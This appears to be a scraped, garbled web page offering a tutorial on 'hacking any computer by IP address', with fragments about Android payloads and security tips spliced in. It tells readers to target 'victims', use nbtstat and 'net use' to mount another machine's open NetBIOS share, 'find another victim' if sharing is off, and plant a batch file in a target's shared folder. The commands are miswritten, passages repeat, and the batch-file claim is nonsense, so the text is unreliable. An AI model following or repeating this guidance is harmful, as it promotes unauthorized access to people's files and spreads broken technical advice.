Here we post method to hack any computer or pc by their ip address.For getting ip address of victim’s computer we also post how to get victim’s ip address online.By ip address you can access their full computer system, their all files and folders, photos,videos and any other files stored in their hard disk by our little and easy tutorials.
- How To Hack Android Phone Remotely. Step 1- Open terminal in Kali Linux. Type ifconfig and note down your ip address. If your victim is in the same network in which you are, you need to use this ip address as lhost while creating payload and setting up listener. If your victim is on the internet, you need to do port forwarding for this using.
- Nov 14, 2019 The same goes for applications you use — automatically updating these helps keep your software secure with little effort from you. Test Your Defenses You should test your firewall and consider scanning your computer with a security vulnerability scanner, and possibly running a second-opinion malware scanner to ensure your defenses are as.
Note: Read my latest tutorial that will work 100% than this article :
Hacking computer with just IP address
Hacking computer with just IP address
In my Last Post I guide you to get the IP address of Your victim. Now i am going to guide you how to access the victim system remotely using the IP address.
Steps to Follow:
Step 1:
Now Go to Star and click Run and then type as “CMD” and hit enter.
command prompt will open.
Now Go to Star and click Run and then type as “CMD” and hit enter.
command prompt will open.
Step 2:
Type in cmd as “nbtstat -a IPaddressOfVictim” and hit enter.
Type in cmd as “nbtstat -a IPaddressOfVictim” and hit enter.
For eg:
nbstat -a 223.222.222.222
If you see this your in NetBIOS Remote Machine Name Table
![Network Network](/uploads/1/2/6/8/126877916/221525844.jpg)
![Hack Hack](/uploads/1/2/6/8/126877916/638903969.jpg)
Computer To Computer Network Mac
Name Type Status ————————————————————--
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = xx-xx-xx-xx-xx-xx
—————————————————————
—————————————————————
If you don’t get the number <20>.
The victim disabled the File And Printer Sharing, find another victim.
The victim disabled the File And Printer Sharing, find another victim.
Step 4:
Now type as “net use x: IPaddressOfVictimCDISK” and hit enter>
Now type as “net use x: IPaddressOfVictimCDISK” and hit enter>
replace with ip address of vitim in the place of “IPaddressOfVictim.
You can give any letter instead of ‘x’.
You can give any letter instead of ‘x’.
For eg:
net use x:223.222.222.222CDISK
net use x:223.222.222.222CDISK
Step 5:
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.
desktop and you will see a new network drive X:.
This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to “hack” is not on your network.
Home Network Mac
If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.